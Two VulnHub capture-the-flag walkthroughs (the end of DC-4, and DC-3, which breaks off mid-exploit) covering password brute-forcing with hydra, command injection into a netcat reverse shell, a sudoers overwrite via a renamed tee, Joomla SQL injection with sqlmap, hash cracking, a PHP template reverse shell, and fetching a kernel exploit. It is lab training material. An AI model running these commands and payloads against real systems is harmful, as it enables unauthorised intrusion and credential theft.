==> DIRECTORY: http://192.168.56.101/images/                                                                                                                                                           
+ http://192.168.56.101/index.php (CODE:200|SIZE:506)                                                                                                                                                  
                                                                                                                                                                                                       
---- Entering directory: http://192.168.56.101/css/ ----
                                                                                                                                                                                                       
---- Entering directory: http://192.168.56.101/images/ ----
                                                                                                                                                                                                       
-----------------
END_TIME: Sat Nov  2 10:23:55 2019
DOWNLOADED: 13836 - FOUND: 1
root@ubuntu:~/src/nikto/program# 

Dirb didn't come back with anything interesting either. If we visit to index page we are greeted with an admin login page.

username=admin&password=password

If we sniff the request with burp we get the POST string which it submits to login.php we can use hydra to try and brute force the login to the admin page.

root@ubuntu:~# hydra -l admin -P /home/sam/wordlists/1000-most-common-passwords.txt 192.168.56.101 http-post-form "/login.php:username=^USER^&password=^PASS^:S=logout"
Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (http://www.thc.org/thc-hydra) starting at 2019-11-02 10:53:24
[DATA] max 16 tasks per 1 server, overall 16 tasks, 1002 login tries (l:1/p:1002), ~63 tries per task
[DATA] attacking http-post-form://192.168.56.101:80//login.php:username=^USER^&password=^PASS^:S=logout
[80][http-post-form] host: 192.168.56.101   login: admin   password: happy
1 of 1 target successfully completed, 1 valid password found
Hydra (http://www.thc.org/thc-hydra) finished at 2019-11-02 10:53:28
root@ubuntu:~# 

We find a successful login and pass combination, lets login and see what we got.

We can see that you are allowed to run commands on the page. if we sniff the request with burp we get the following results.

radio=ls+l&submit=Run

We can insert our own commands in to the radio parameter of the request and get back the source code of the page.

command.php
$my_cmd = $_POST['radio'];
//echo $my_cmd;
$output = shell_exec($my_cmd);
print $output;

If we try and execute a reverse connect shell we get a connect back to our local machine

radio=nc+-e+/bin/sh+192.168.56.1+4444&submit=Run

root@ubuntu:~# nc -l -v -p 4444
Listening on [0.0.0.0] (family 0, port 4444)
Connection from dc-4 59178 received!
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)           
python -c 'import pty;pty.spawn("/bin/bash")'
www-data@dc-4:/usr/share/nginx/html$ 

We cat the /etc/passwd file and find some users on the system.

www-data@dc-4:/usr/share/nginx/html$ cat /etc/passwd
cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
_apt:x:104:65534::/nonexistent:/bin/false
messagebus:x:105:109::/var/run/dbus:/bin/false
sshd:x:106:65534::/run/sshd:/usr/sbin/nologin
nginx:x:107:111:nginx user,,,:/nonexistent:/bin/false
charles:x:1001:1001:Charles,,,:/home/charles:/bin/bash
jim:x:1002:1002:Jim,,,:/home/jim:/bin/bash
sam:x:1003:1003:Sam,,,:/home/sam:/bin/bash
Debian-exim:x:108:112::/var/spool/exim4:/bin/false
www-data@dc-4:/usr/share/nginx/html$

We found 4 users on the system.

charles:x:1001:1001:Charles,,,:/home/charles:/bin/bash
jim:x:1002:1002:Jim,,,:/home/jim:/bin/bash
sam:x:1003:1003:Sam,,,:/home/sam:/bin/bash

If we change directory to jim and list the contents of the directory we find some interesting results.

www-data@dc-4:/home$ cd jim
cd jim
www-data@dc-4:/home/jim$ ls -la
ls -la
total 32
drwxr-xr-x 3 jim  jim  4096 Apr  7  2019 .
drwxr-xr-x 5 root root 4096 Apr  7  2019 ..
-rw-r--r-- 1 jim  jim   220 Apr  6  2019 .bash_logout
-rw-r--r-- 1 jim  jim  3526 Apr  6  2019 .bashrc
-rw-r--r-- 1 jim  jim   675 Apr  6  2019 .profile
drwxr-xr-x 2 jim  jim  4096 Apr  7  2019 backups
-rw------- 1 jim  jim   528 Apr  6  2019 mbox
-rwsrwxrwx 1 jim  jim   174 Apr  6  2019 test.sh
www-data@dc-4:/home/jim$ 

We see two files mbox and test.sh if we cat the contents of test.sh we find.

www-data@dc-4:/home/jim$ cat test.sh
cat test.sh
#!/bin/bash
for i in {1..5}
do
 sleep 1
 echo "Learn bash they said."
 sleep 1
 echo "Bash is good they said."
done
 echo "But I'd rather bash my head against a brick wall."
www-data@dc-4:/home/jim$ 

So there is nothing interesting about the test.sh file if we search for SUID able programs we see that it is indeed SUID able.

www-data@dc-4:/home/jim$ find / -xdev -perm -4000 -type f 2>/dev/null
find / -xdev -perm -4000 -type f 2>/dev/null
/usr/bin/gpasswd
/usr/bin/chfn
/usr/bin/sudo
/usr/bin/chsh
/usr/bin/newgrp
/usr/bin/passwd
/usr/lib/eject/dmcrypt-get-device
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/sbin/exim4
/bin/mount
/bin/umount
/bin/su
/bin/ping
/home/jim/test.sh
www-data@dc-4:/home/jim$ 

If we move on to the backups directory we find a file called old-passwords.bak which we will use to brute force ssh. Once we copy over the old-passwords.bak file to our local computer and run hydra against ssh with jim and the username.

root@ubuntu:~/src/nikto/program# hydra -l jim -P /home/sam/old-pass.txt ssh://192.168.56.101
Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (http://www.thc.org/thc-hydra) starting at 2019-11-02 11:27:46
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 252 login tries (l:1/p:252), ~16 tries per task
[DATA] attacking ssh://192.168.56.101:22/
[22][ssh] host: 192.168.56.101   login: jim   password: jibril04
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 3 final worker threads did not complete until end.
[ERROR] 3 targets did not resolve or could not be connected
[ERROR] 16 targets did not complete
Hydra (http://www.thc.org/thc-hydra) finished at 2019-11-02 11:28:43
root@ubuntu:~/src/nikto/program# 

Hydra found a valid user and pass combo now its time to log in to the user jim and see what we can do.

root@ubuntu:~/src/nikto/program# ssh jim@192.168.56.101
The authenticity of host '192.168.56.101 (192.168.56.101)' can't be established.
ECDSA key fingerprint is SHA256:vtcgdCXO4d3KmnjiIIkH1Een5F1AiSx3qp0ABgwdvww.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '192.168.56.101' (ECDSA) to the list of known hosts.
jim@192.168.56.101's password: 
Linux dc-4 4.9.0-3-686 #1 SMP Debian 4.9.30-2+deb9u5 (2017-09-19) i686

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
You have mail.
Last login: Sun Apr  7 02:23:55 2019 from 192.168.0.100
jim@dc-4:~$ 

We notice it says we have mail in our inbox. If we strings the mbox file we see that it is an email header.

jim@dc-4:~$ strings mbox
From root@dc-4 Sat Apr 06 20:20:04 2019
Return-path: 
Envelope-to: jim@dc-4
Delivery-date: Sat, 06 Apr 2019 20:20:04 +1000
Received: from root by dc-4 with local (Exim 4.89)
 (envelope-from )
 id 1hCiQe-0000gc-EC
 for jim@dc-4; Sat, 06 Apr 2019 20:20:04 +1000
To: jim@dc-4
Subject: Test
MIME-Version: 1.0
Content-Type: text/plain; charset="UTF-8"
Content-Transfer-Encoding: 8bit
Message-Id: 
From: root 
Date: Sat, 06 Apr 2019 20:20:04 +1000
Status: RO
This is a test.
jim@dc-4:~$ 

Lets check /var/mail/jim and read our mail messages.

jim@dc-4:~$ cd /var/mail
jim@dc-4:/var/mail$ ls -la
total 12
drwxrwsr-x  2 root mail 4096 Apr  6  2019 .
drwxr-xr-x 12 root root 4096 Apr  5  2019 ..
-rw-rw----  1 jim  mail  715 Apr  6  2019 jim
jim@dc-4:/var/mail$ cat jim
From charles@dc-4 Sat Apr 06 21:15:46 2019
Return-path: 
Envelope-to: jim@dc-4
Delivery-date: Sat, 06 Apr 2019 21:15:46 +1000
Received: from charles by dc-4 with local (Exim 4.89)
 (envelope-from )
 id 1hCjIX-0000kO-Qt
 for jim@dc-4; Sat, 06 Apr 2019 21:15:45 +1000
To: jim@dc-4
Subject: Holidays
MIME-Version: 1.0
Content-Type: text/plain; charset="UTF-8"
Content-Transfer-Encoding: 8bit
Message-Id: 
From: Charles 
Date: Sat, 06 Apr 2019 21:15:45 +1000
Status: O

Hi Jim,

I'm heading off on holidays at the end of today, so the boss asked me to give you my password just in case anything goes wrong.

Password is:  ^xHhA&hvim0y

See ya,
Charles

jim@dc-4:/var/mail$ 

We got another password and username which are on the box lets su to charles and see what he can do.

jim@dc-4:/var/mail$ su charles
Password: 
charles@dc-4:/var/mail$ id
uid=1001(charles) gid=1001(charles) groups=1001(charles)
charles@dc-4:/var/mail$ 

charles@dc-4:~$ sudo -l
Matching Defaults entries for charles on dc-4:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User charles may run the following commands on dc-4:
    (root) NOPASSWD: /usr/bin/teehee
charles@dc-4:~$ 

We are able to run the /usr/bin/teehee program which is just the tee program renamed. With that in mind we can add the user charles to the sudoers group and then su.

charles@dc-4:~$ echo "charles ALL=(ALL:ALL) ALL" | sudo /usr/bin/teehee /etc/sudoers
charles ALL=(ALL:ALL) ALL
charles@dc-4:~$ sudo su

We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:

    #1) Respect the privacy of others.
    #2) Think before you type.
    #3) With great power comes great responsibility.

[sudo] password for charles: 
root@dc-4:/home/charles# id
uid=0(root) gid=0(root) groups=0(root)
root@dc-4:/home/charles# whoami
root
root@dc-4:/home/charles# cd /root
root@dc-4:~# ls
flag.txt
root@dc-4:~# cat flag.txt



888       888          888 888      8888888b.                             888 888 888 888 
888   o   888          888 888      888  "Y88b                            888 888 888 888 
888  d8b  888          888 888      888    888                            888 888 888 888 
888 d888b 888  .d88b.  888 888      888    888  .d88b.  88888b.   .d88b.  888 888 888 888 
888d88888b888 d8P  Y8b 888 888      888    888 d88""88b 888 "88b d8P  Y8b 888 888 888 888 
88888P Y88888 88888888 888 888      888    888 888  888 888  888 88888888 Y8P Y8P Y8P Y8P 
8888P   Y8888 Y8b.     888 888      888  .d88P Y88..88P 888  888 Y8b.      "   "   "   "  
888P     Y888  "Y8888  888 888      8888888P"   "Y88P"  888  888  "Y8888  888 888 888 888 


Congratulations!!!

Hope you enjoyed DC-4.  Just wanted to send a big thanks out there to all those
who have provided feedback, and who have taken time to complete these little
challenges.

If you enjoyed this CTF, send me a tweet via @DCAU7.
root@dc-4:~# 

VulnHub: DC-3 Walkthrough

We first start off with an nmap scan on the remote host.

root@ubuntu:~/src# nmap -p- -T5 192.168.56.102

Starting Nmap 7.60 ( https://nmap.org ) at 2019-11-01 13:24 MDT
Warning: 192.168.56.102 giving up on port because retransmission cap hit (2).
Stats: 0:02:35 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 99.99% done; ETC: 13:27 (0:00:00 remaining)
Nmap scan report for symfonos.local (192.168.56.102)
Host is up (0.00073s latency).
Not shown: 65529 closed ports
PORT      STATE    SERVICE
80/tcp    open     http
MAC Address: 08:00:27:1C:53:6A (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 185.63 seconds
root@ubuntu:~/src#

NMAP came back with only port 80 open. Our next task is to fire up nikto and run it against the host.

root@ubuntu:~/src/nikto/program# ./nikto.pl -host 192.168.56.102
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.56.102
+ Target Hostname:    192.168.56.102
+ Target Port:        80
+ Start Time:         2019-11-01 13:28:46 (GMT-6)
---------------------------------------------------------------------------
+ Server: Apache/2.4.18 (Ubuntu)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Apache/2.4.18 appears to be outdated (current is at least Apache/2.4.39). Apache 2.2.34 is the EOL for the 2.x branch.
+ IP address found in the 'location' header. The IP is "127.0.1.1".
+ OSVDB-630: The web server may reveal its internal or real IP in the Location header via a request to /images over HTTP/1.0. The value is "127.0.1.1".
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ DEBUG HTTP verb may show server debugging information. See https://docs.microsoft.com/en-us/visualstudio/debugger/how-to-enable-debugging-for-aspnet-applications?view=vs-2017 for details.
+ OSVDB-8193: /index.php?module=ew_filemanager&type=admin&func=manager&pathext=../../../etc: EW FileManager for PostNuke allows arbitrary file retrieval.
+ OSVDB-3092: /administrator/: This might be interesting.
+ OSVDB-3092: /bin/: This might be interesting.
+ OSVDB-3092: /includes/: This might be interesting.
+ OSVDB-3092: /tmp/: This might be interesting.
+ OSVDB-3092: /LICENSE.txt: License file found may identify site software.
+ OSVDB-3233: /icons/README: Apache default file found.
+ /htaccess.txt: Default Joomla! htaccess.txt file found. This should be removed or renamed.
+ /administrator/index.php: Admin login page/section found.
+ 8757 requests: 0 error(s) and 17 item(s) reported on remote host
+ End Time:           2019-11-01 13:29:50 (GMT-6) (64 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
root@ubuntu:~/src/nikto/program# 

Nikto came back with some intresting results. We check some of the directories in the output and find that this is a server running the Joomla CMS software. We hit the site with joomscan next. After running joomscan we find out the version is Joomla 3.7.0. We move on to searchsploit to see if there are any exploits for this version of joomla

root@ubuntu:~/src/exploitdb# ./searchsploit joomla 3.7.0
------------------------------------------------------------------------------------------------------------- -------------------------------------------
 Exploit Title                                                                                               |  Path
                                                                                                             | (/home/sam/src/exploitdb/)
------------------------------------------------------------------------------------------------------------- -------------------------------------------
Joomla! 3.7.0 - 'com_fields' SQL Injection                                                                   | exploits/php/webapps/42033.txt
------------------------------------------------------------------------------------------------------------- -------------------------------------------
Shellcodes: No Result
root@ubuntu:~/src/exploitdb# 

There is one vulnerablity available for this version of joomla if we read the exploit file we find the following:

URL Vulnerable: http://localhost/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml%27

It gives us instructions for running sqlmap against the host so we will use the example in the exploit file.

./sqlmap.py -u "http://192.168.56.102/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]

[13:52:22] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 16.04 or 16.10 (yakkety or xenial)
web application technology: Apache 2.4.18
back-end DBMS: MySQL >= 5.1
[13:52:22] [INFO] fetching database names
[13:52:23] [INFO] used SQL query returns 5 entries
[13:52:23] [INFO] retrieved: 'information_schema'
[13:52:23] [INFO] retrieved: 'joomladb'
[13:52:23] [INFO] retrieved: 'mysql'
[13:52:23] [INFO] retrieved: 'performance_schema'
[13:52:23] [INFO] retrieved: 'sys'
available databases [5]:

We found 5 databases on the server its next time to extract tables for the joomladb database.

./sqlmap.py -u "http://192.168.56.102/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering] --tables joomladb

Database: joomladb
[76 tables]
+------------------------------------------------------+
| #__assets                                            |
| #__associations                                      |
| #__banner_clients                                    |
| #__banner_tracks                                     |
| #__banners                                           |
| #__bsms_admin                                        |
| #__bsms_books                                        |
| #__bsms_comments                                     |
| #__bsms_locations                                    |
| #__bsms_mediafiles                                   |
| #__bsms_message_typ                                  |
| #__bsms_podcast                                      |
| #__bsms_series                                       |
| #__bsms_servers                                      |
| #__bsms_studies                                      |
| #__bsms_studytopics                                  |
| #__bsms_teachers                                     |
| #__bsms_templatecod                                  |
| #__bsms_templates                                    |
| #__bsms_timeset                                      |
| #__bsms_topics                                       |
| #__bsms_update                                       |
| #__categories                                        |
| #__contact_details                                   |
| #__content_frontpag                                  |
| #__content_rating                                    |
| #__content_types                                     |
| #__content                                           |
| #__contentitem_tag_                                  |
| #__core_log_searche                                  |
| #__extensions                                        |
| #__fields_categorie                                  |
| #__fields_groups                                     |
| #__fields_values                                     |
| #__fields                                            |
| #__finder_filters                                    |
| #__finder_links_ter                                  |
| #__finder_links                                      |
| #__finder_taxonomy_                                  |
| #__finder_taxonomy                                   |
| #__finder_terms_com                                  |
| #__finder_terms                                      |
| #__finder_tokens_ag                                  |
| #__finder_tokens                                     |
| #__finder_types                                      |
| #__jbsbackup_timese                                  |
| #__jbspodcast_times                                  |
| #__languages                                         |
| #__menu_types                                        |
| #__menu                                              |
| #__messages_cfg                                      |
| #__messages                                          |
| #__modules_menu                                      |
| #__modules                                           |
| #__newsfeeds                                         |
| #__overrider                                         |
| #__postinstall_mess                                  |
| #__redirect_links                                    |
| #__schemas                                           |
| #__session                                           |
| #__tags                                              |
| #__template_styles                                   |
| #__ucm_base                                          |
| #__ucm_content                                       |
| #__ucm_history                                       |
| #__update_sites_ext                                  |
| #__update_sites                                      |
| #__updates                                           |
| #__user_keys                                         |
| #__user_notes                                        |
| #__user_profiles                                     |
| #__user_usergroup_m                                  |
| #__usergroups                                        |
| #__users                                             |
| #__utf8_conversion                                   |
| #__viewlevels                                        |
+------------------------------------------------------+

We got back 76 tables but the one we are intrested in is the '#_users' table. We move next to extract the columns from the remote host.

./sqlmap.py -u "http://192.168.56.102/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering] --columns -D joomladb -T "#_users"

We get three columns from the users table: email,username and password for the admin of the site.

admin:$2y$10$DpfpYjADpejngxNh9GnmCeyIHCWpL97CVRnGeZsVJwR0kWFlfB1Zu

Our next task is to fire up JohnTheRipper and crack the hash we got from the database

root@ubuntu:~/src/JohnTheRipper/run# ./john --wordlist=/home/sam/wordlists/rockyou.txt /home/sam/joomla.txt
Using default input encoding: UTF-8
Loaded 1 password hash (bcrypt [Blowfish 32/64 X3])
Cost 1 (iteration count) is 1024 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
snoopy           (admin)
1g 0:00:00:03 DONE (2019-11-01 14:16) 0.3311g/s 47.68p/s 47.68c/s 47.68C/s mylove..sandra
Use the "--show" option to display all of the cracked passwords reliably
Session completed
root@ubuntu:~/src/JohnTheRipper/run#

Now we can try and login to the admin interface on the joomla site.

Just like in wordpress if you are admin you can edit the php files in the templates folder. We are going to do that and add our reverse connect php code file to the index.php file of the theme template.

Once we saved the php file its time to click on the 'Template Preview' button the execute our reverse shell code and connect back to our kali box. We executed the template file through the preview function in the joomla cms and got a connect back to our kali box.

root@kali:~# nc -l -v -p 4444
listening on [any] 4444 ...
192.168.56.102: inverse host lookup failed: Unknown host
connect to [192.168.56.101] from (UNKNOWN) [192.168.56.102] 39464
Linux DC-3 4.4.0-21-generic #37-Ubuntu SMP Mon Apr 18 18:34:49 UTC 2016 i686 i686 i686 GNU/Linux
 06:23:02 up  1:00,  0 users,  load average: 0.00, 0.04, 0.11
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ python -c "import pty;pty.spawn('/bin/bash')"
www-data@DC-3:/$ 

We upgrade the shell and go off searching.

www-data@DC-3:/var/www/html$ cat /etc/passwd
cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
syslog:x:104:108::/home/syslog:/bin/false
_apt:x:105:65534::/nonexistent:/bin/false
lxd:x:106:65534::/var/lib/lxd/:/bin/false
mysql:x:107:111:MySQL Server,,,:/nonexistent:/bin/false
messagebus:x:108:112::/var/run/dbus:/bin/false
uuidd:x:109:113::/run/uuidd:/bin/false
dnsmasq:x:110:65534:dnsmasq,,,:/var/lib/misc:/bin/false
sshd:x:111:65534::/var/run/sshd:/usr/sbin/nologin
dc3:x:1000:1000:dc3,,,:/home/dc3:/bin/bash
www-data@DC-3:/var/www/html$ 

We see there is one user on the system 'dc-3' other than that there nothing intresting in the passwd file.

www-data@DC-3:/var/www/html$ find / -xdev -perm -4000 -type f 2>/dev/null
find / -xdev -perm -4000 -type f 2>/dev/null
/bin/ping6
/bin/ntfs-3g
/bin/umount
/bin/su
/bin/fusermount
/bin/mount
/bin/ping
/tmp/ebpf_mapfd_doubleput_exploit/suidhelper
/usr/lib/snapd/snap-confine
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/i386-linux-gnu/lxc/lxc-user-nic
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/eject/dmcrypt-get-device
/usr/bin/passwd
/usr/bin/newgidmap
/usr/bin/gpasswd
/usr/bin/sudo
/usr/bin/pkexec
/usr/bin/chsh
/usr/bin/chfn
/usr/bin/newuidmap
/usr/bin/newgrp
/usr/bin/at
www-data@DC-3:/var/www/html$ 

We search for SUID able binaries on the system but find nothing that could help us escalate our privs so we move on to the kernel version information looking for a kernel exploit.

www-data@DC-3:/var/www/html$ uname -a
uname -a
Linux DC-3 4.4.0-21-generic #37-Ubuntu SMP Mon Apr 18 18:34:49 UTC 2016 i686 i686 i686 GNU/Linux
www-data@DC-3:/var/www/html$ 

www-data@DC-3:/var/www/html$ cat /etc/os-release
cat /etc/os-release
NAME="Ubuntu"
VERSION="16.04 LTS (Xenial Xerus)"
ID=ubuntu
ID_LIKE=debian
PRETTY_NAME="Ubuntu 16.04 LTS"
VERSION_ID="16.04"
HOME_URL="http://www.ubuntu.com/"
SUPPORT_URL="http://help.ubuntu.com/"
BUG_REPORT_URL="http://bugs.launchpad.net/ubuntu/"
UBUNTU_CODENAME=xenial
www-data@DC-3:/var/www/html$ 

We see the kernel version is 4.4.0-21 and running Ubuntu 16.04LTS lets fire up searchsploit and look for some possible exploits for this version of linux.

root@ubuntu:~/src/exploitdb# ./searchsploit ubuntu 16.04
------------------------------------------------------------------------------------------------------------------------------------ -------------------------------------------
 Exploit Title                                                                                                                      |  Path
                                                                                                                                    | (/home/sam/src/exploitdb/)
------------------------------------------------------------------------------------------------------------------------------------ -------------------------------------------
Apport 2.x (Ubuntu Desktop 12.10 < 16.04) - Local Code Execution                                                                    | exploits/linux/local/40937.txt
Exim 4 (Debian 8 / Ubuntu 16.04) - Spool Privilege Escalation                                                                       | exploits/linux/local/40054.c
Google Chrome (Fedora 25 / Ubuntu 16.04) - 'tracker-extract' / 'gnome-video-thumbnailer' + 'totem' Drive-By Download                | exploits/linux/local/40943.txt
LightDM (Ubuntu 16.04/16.10) - 'Guest Account' Local Privilege Escalation                                                           | exploits/linux/local/41923.txt
Linux Kernel (Debian 7.7/8.5/9.0 / Ubuntu 14.04.2/16.04.2/17.04 / Fedora 22/25 / CentOS 7.3.1611) - 'ldso_hwcap_64 Stack Clash' Loc | exploits/linux_x86-64/local/42275.c
Linux Kernel (Debian 9/10 / Ubuntu 14.04.5/16.04.2/17.04 / Fedora 23/24/25) - 'ldso_dynamic Stack Clash' Local Privilege Escalation | exploits/linux_x86/local/42276.c
Linux Kernel (Ubuntu 16.04) - Reference Count Overflow Using BPF Maps                                                               | exploits/linux/dos/39773.txt
Linux Kernel 4.14.7 (Ubuntu 16.04 / CentOS 7) - (KASLR & SMEP Bypass) Arbitrary File Read                                           | exploits/linux/local/45175.c
Linux Kernel 4.4 (Ubuntu 16.04) - 'BPF' Local Privilege Escalation (Metasploit)                                                     | exploits/linux/local/40759.rb
Linux Kernel 4.4 (Ubuntu 16.04) - 'snd_timer_user_ccallback()' Kernel Pointer Leak                                                  | exploits/linux/dos/46529.c
Linux Kernel 4.4.0 (Ubuntu 14.04/16.04 x86-64) - 'AF_PACKET' Race Condition Privilege Escalation                                    | exploits/linux_x86-64/local/40871.c
Linux Kernel 4.4.0-21 (Ubuntu 16.04 x64) - Netfilter target_offset Out-of-Bounds Privilege Escalation                               | exploits/linux_x86-64/local/40049.c
Linux Kernel 4.4.0-21 < 4.4.0-51 (Ubuntu 14.04/16.04 x86-64) - 'AF_PACKET' Race Condition Privilege Escalation                      | exploits/linux/local/47170.c
Linux Kernel 4.4.x (Ubuntu 16.04) - 'double-fdput()' bpf(BPF_PROG_LOAD) Privilege Escalation                                        | exploits/linux/local/39772.txt
Linux Kernel 4.6.2 (Ubuntu 16.04.1) - 'IP6T_SO_SET_REPLACE' Local Privilege Escalation                                              | exploits/linux/local/40489.txt
Linux Kernel 4.8 (Ubuntu 16.04) - Leak sctp Kernel Pointer                                                                          | exploits/linux/dos/45919.c
Linux Kernel < 4.13.9 (Ubuntu 16.04 / Fedora 27) - Local Privilege Escalation                                                       | exploits/linux/local/45010.c
Linux Kernel < 4.4.0-116 (Ubuntu 16.04.4) - Local Privilege Escalation                                                              | exploits/linux/local/44298.c
Linux Kernel < 4.4.0-21 (Ubuntu 16.04 x64) - 'netfilter target_offset' Local Privilege Escalation                                   | exploits/linux/local/44300.c
Linux Kernel < 4.4.0-83 / < 4.8.0-58 (Ubuntu 14.04/16.04) - Local Privilege Escalation (KASLR / SMEP)                               | exploits/linux/local/43418.c
Linux Kernel < 4.4.0/ < 4.8.0 (Ubuntu 14.04/16.04 / Linux Mint 17/18 / Zorin) - Local Privilege Escalation (KASLR / SMEP)           | exploits/linux/local/47169.c
------------------------------------------------------------------------------------------------------------------------------------ -------------------------------------------
Shellcodes: No Result
root@ubuntu:~/src/exploitdb# 

We find one that looks interesting, the Linux Kernel 4.4.x (Ubuntu 16.04) - 'double-fdput()' bpf(BPF_PROG_LOAD) Privilege Escalation exploit. We download the exploit to the remote host and try and compile the exploit on the machine.

www-data@DC-3:/tmp$ wget http://192.168.56.1/~sam/exploit.tar
wget http://192.168.56.1/~sam/exploit.tar
--2019-11-02 06:52:42--  http://192.168.56.1/~sam/exploit.tar
Connecting to 192.168.56.1:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 20480 (20K) [application/x-tar]
Saving to: 'exploit.tar'

exploit.tar         100%[===================>]  20.00K  --.-KB/s    in 0s      

2019-11-02 06:52:42 (134 MB/s) - 'exploit.tar' saved [20480/20480]

www-data@DC-3:/tmp$ ls
ls
exploit.tar
systemd-private-268ff12d81824fca955ee00cf8f2944e-systemd-timesyncd.service-6lcYCc
www-data@DC-3:/tmp$

We need to untar all of the files in the exploit archive before we can compile. After that all that left to do is compile the exploit and cross our fingers it works.

www-data@DC-3:/tmp$ tar xvf exploit.tar
tar xvf exploit.tar
ebpf_mapfd_doubleput_exploit/
ebpf_mapfd_doubleput_exploit/hello.c
ebpf_mapfd_doubleput_exploit/suidhelper.c
ebpf_mapfd_doubleput_exploit/compile.sh
ebpf_mapfd_doubleput_exploit/doubleput.c
www-data@DC-3:/tmp$ cd ebpf_mapfd_doubleput_exploit
www-data@DC-3:/tmp/ebpf_mapfd_doubleput_exploit$ ls -la
ls -la
total 28
drwxr-x--- 2 www-data www-data 4096 Apr 26  2016 .
drwxrwxrwt 9 root     root     4096 Nov  2 06:53 ..
-rwxr-x--- 1 www-data www-data  155 Apr 26  2016 compile.sh
-rw-r----- 1 www-data www-data 4188 Apr 26  2016 doubleput.c
-rw-r----- 1 www-data www-data 2186 Apr 26  2016 hello.c
